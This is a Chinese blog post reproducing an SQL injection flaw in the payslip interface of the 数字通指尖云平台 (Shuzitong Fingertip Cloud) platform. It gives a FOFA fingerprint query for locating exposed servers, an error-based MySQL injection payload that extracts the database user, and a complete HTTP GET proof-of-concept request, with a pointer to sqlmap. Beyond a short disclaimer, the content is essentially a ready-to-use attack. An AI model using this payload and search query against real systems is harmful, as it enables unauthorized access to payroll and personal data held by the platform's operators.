数字通指尖云平台payslip接口处 SQL注入漏洞复现 [附POC]

最新推荐文章于 2024-08-27 17:04:06 发布
最新推荐文章于 2024-08-27 17:04:06 发布
阅读量166 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 系统安全 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/140774407
版权

文章目录

数字通指尖云平台payslip接口处 SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

数字通指尖云平台payslip接口处存在SQL注入漏洞,可通过SQL注入可获取敏感信息甚至获取到服务器权限。

0x03 影响版本

数字通指尖云平台

0x04 漏洞环境

FOFA语法: body=“/assets/8cca19ff/css/bootstrap-yii.css”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

Payload:

 PayslipUser[user_id]=1 AND (SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

POC (GET)

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=1 AND (SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept:  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

3.复现

在这里插入图片描述sqlmap:
在这里插入图片描述

gaynell
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
数字云平台 智慧政务 PayslipUser SQL注入漏洞复现
0xSec
07-17 1193
数字云平台 智慧政务OA PayslipUser 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
数字指尖云平台智慧政务平台存在SQL注入漏洞
m0_59117112的博客
04-12 377
数字指尖云平台存在SQL注入漏洞,可SQL注入可获取敏感信息甚至获取到服务器权限。
测试bug分析图_银行功能测试入门篇(2)
weixin_39811193的博客
12-09 1045
有了功能测试基础了解,结合从事银行外包项目经验,在此跟大家分享如何快速做外包功能测试。希望以下工作流程对大家有用。!敢想敢拼敢干!1、认知需求从行方拿到测试范围,并向开发经理寻到最终需求,并解读理解后再与业务人员确认所测流程。之后测试组长给需求大体模块进行划分工作,评估工作量,把评估工作量发送给行方项目经理评审,待行方负责人审核过,执行下一步工作:需求调研。2、需求确认,编写测试计划,分配测试模...
POC编写基础————1、基础知识
Fly_鹏程万里
02-27 1万+
前言 本系列内容主要讲解POC的编写,而笔者也是一个小小白,刚刚学习POC的编写不久,打算记录一些心得,有兴趣的可以一起讨论,一起交流,同时可以一起分享各自收藏或者编写的POC进行学习! 什么是POC PoC(全称: Proof of Concept), 中文可译作“观点验证程序”,它主要用于证明提出者的观点是否正确,在信息安全领域这种观点一般是我们对于漏洞的判断,即目标系统是否存在漏洞。 ...
POC项目建设模式
热门推荐
anywhere88的博客
11-27 2万+
POC项目建设模式 一、POC的概念 POC测试,即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。 特别是在应用系统选型阶段,一些大型企业的业务流程比较复杂,并非单一的功...
什么是POC
autotestM的博客
02-14 1万+
什么是POC
payload sql注入_优客365_v2.9 SQL注入漏洞复现POC
weixin_39778582的博客
11-27 368
面由心生,相随貌转。俗话说得好HTTP_REFERER注入1、漏洞编号CNVD-2017-120172、漏洞介绍优客365是一个基于 PHP+MYSQL 开发构建的开源网站分类目录管理系统,在 2.9 版本的首页 index.php 存在基于 HTTP-REFERER 字段的 SQL 注入漏洞,攻击者可利用该漏洞执行任意 SQL 语句,获得数据库敏感信息。3、源码分析index.php...
mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql
weixin_35917998的博客
01-19 533
日期:2019-07-23 19:55:59更新:2019-08-02 10:40:37作者:Bay0net介绍:Mysql 注入笔记0x01、 基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行:一行(=元组,或记录)是一组相关的数据,例如一条用...
paySlip.pdf
07-15
工资单上的数字和信息必须准确无误,因为它们关系到雇员的合法权益。雇员应当在收到工资单后仔细核对所有数据是否正确,如有不符应立即与雇主或人力资源部门联系确认和纠正。 11. 文件完整性和扫描识别问题: 由于...
h5-iai-garment-payslip
04-01
h5_cordova庙宇项目 项目设置 npm install 编译和热重装以进行开发 npm run serve || npm run start 量产 npm run prod 整理和修复文件 npm run lint 自定义配置 请参阅。
如何做IT项目PoC测试
木东的博客
11-25 1万+
PoC(Proof of Concept),即概念验证。常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。 验证内容 1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以过与多家供应商交流后,列出自己所需要的功能; 2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求; 3、产品...
选型测试.概念验证PoC(Proof of Concept)
u010025781的博客
10-25 4127
PoC(Proof of Concept),即概念验证。常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。
数据中台POC演示流程
数通畅联
03-02 5036
数据中台POC是基于公司MDM、ESB和DAP三款核心产品搭建的集成环境,在对整个环境进行演示时需要从业务角度出发。本文针对整个环境演示的方式、流程和注意事项进行总结。
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 5566
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC漏洞验证程序,功能为检测漏洞是否存在。poc和exp(全称Exploit)的区别就是,poc漏洞验证程序,exp是漏洞利用程序。针对用型应用漏洞编写poc,可
独家 | LLM的旅程:从POC(概念验证)到生产环境(上篇)
最新发布
数据派THU
08-27 97
作者:Adva Nakash Peleg 翻译:付雯欣 校对:赵茹萱 本文约3100字,建议阅读10分钟 本文将从实际项目需求出发,手把手带你了解LLM。图:由DALL-E生成的图片试想一下:你有一个很棒的项目想法,可以过大语言模型(LLM)来实现,并且很快实现了一个可运行的概念验证(POC)。你为自己感到骄傲,并惊讶于你只需很少的工作就能使其发挥作用。(只需五行prompt的魔力☺)但...
POC(proof-of-concept)
DBAdream的专栏
03-10 6571
POC(proof-of-concept)   Proof of Concept POC是根据特定客户的特定业务需求而设计的软件、硬件原型的解决方案。POC 的目的是为客户确定合适的系统组成、系统或软件产品版本、方案的服务需求,或者看看建议的方案是否可行。POC 不仅能确定应该做什么,也确定不应该做什么。有时POC的最大价值在于在正式大规模实施方案以前,提前发现应该这个方案可能是无法工作的。
渗透测试常见专业术语
m0_69043895的博客
02-20 775
一篇文章学会网络安全专用术语
sql serve 职工工资管理系统的主要业务:添加加班、出差、考勤信息生成每月工资条,数据查询统计代码
06-07
好的,这个系统的主要业务是管理职工的工资信息。以下是一些可以参考的 SQL Server 代码片段: 1. 添加加班、出差、考勤信息 ``` -- 添加加班信息 INSERT INTO overtime (employee_id, date, hours) VALUES (1, '2021-10-01', 3) -- 添加出差信息 INSERT INTO business_trip (employee_id, start_date, end_date, destination) VALUES (1, '2021-10-05', '2021-10-07', '上海') -- 添加考勤信息 INSERT INTO attendance (employee_id, date, status) VALUES (1, '2021-10-01', '出勤') ``` 2. 生成每月工资条 ``` -- 计算每个员工的工资 SELECT employee_id, SUM(base_salary + overtime_pay + business_trip_pay) AS salary FROM salary_info GROUP BY employee_id -- 生成工资条 INSERT INTO payslip (employee_id, month, salary) VALUES (1, '2021-10', 10000) ``` 3. 数据查询统计 ``` -- 查询某个员工的加班总时长 SELECT SUM(hours) FROM overtime WHERE employee_id = 1 -- 查询某个员工的出差总天数 SELECT DATEDIFF(day, start_date, end_date) + 1 AS days FROM business_trip WHERE employee_id = 1 -- 查询某个员工某个月的工资条信息 SELECT * FROM payslip WHERE employee_id = 1 AND month = '2021-10' ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值